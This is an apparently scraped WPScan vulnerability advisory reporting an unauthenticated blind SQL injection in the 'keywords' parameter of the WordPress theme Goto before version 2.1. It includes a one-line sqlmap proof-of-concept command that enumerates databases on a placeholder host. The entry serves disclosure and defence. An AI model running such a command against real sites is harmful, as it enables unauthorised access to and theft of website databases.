Lucene search

K
wpvulndbWpvulndbWPVDB-ID:1CC6DC17-B019-49DD-8149-C8BBA165EB30
HistoryApr 26, 2021 - 12:00 a.m.

Goto < 2.1 - Unauthenticated Blind SQL Injection

2021-04-2600:00:00
wpscan.com
11

0.003 Low

EPSS

Percentile

68.5%

The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue

PoC

sqlmap --url=“https://example.com/tour-list/?keywords=13&amp;start;_date=13” --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords

CPENameOperatorVersion
gotolt2.1

0.003 Low

EPSS

Percentile

68.5%

Related for WPVDB-ID:1CC6DC17-B019-49DD-8149-C8BBA165EB30